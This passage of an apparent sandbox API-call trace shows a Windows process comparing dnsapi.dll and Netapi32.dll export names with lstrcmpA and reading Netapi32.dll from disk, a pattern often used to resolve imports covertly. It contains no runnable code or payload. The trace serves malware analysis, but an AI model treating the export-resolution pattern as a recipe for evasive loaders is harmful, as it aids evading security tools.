lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0112.465] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0112.466] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0112.466] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0112.467] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0112.467] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0112.467] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0112.467] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0112.467] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0112.467] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0112.467] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0112.474] GetProcessHeap () returned 0x4f0000 [0112.474] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x3a2d010 | out: hHeap=0x4f0000) returned 1 [0112.474] GetProcessHeap () returned 0x4f0000 [0112.474] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509050 [0112.474] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0112.476] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0112.477] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0112.477] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0112.477] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0112.477] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0112.477] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0112.477] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0112.477] GetProcessHeap () returned 0x4f0000 [0112.477] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13b00) returned 0x2cf5030 [0112.477] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0112.477] ReadFile (in: hFile=0x17c, lpBuffer=0x2cf5030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf5030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0112.478] CloseHandle (hObject=0x17c) returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0112.478] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0112.479] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0112.480] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0112.480] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0112.481] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0112.482] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0112.483] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0112.484] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0112.484] 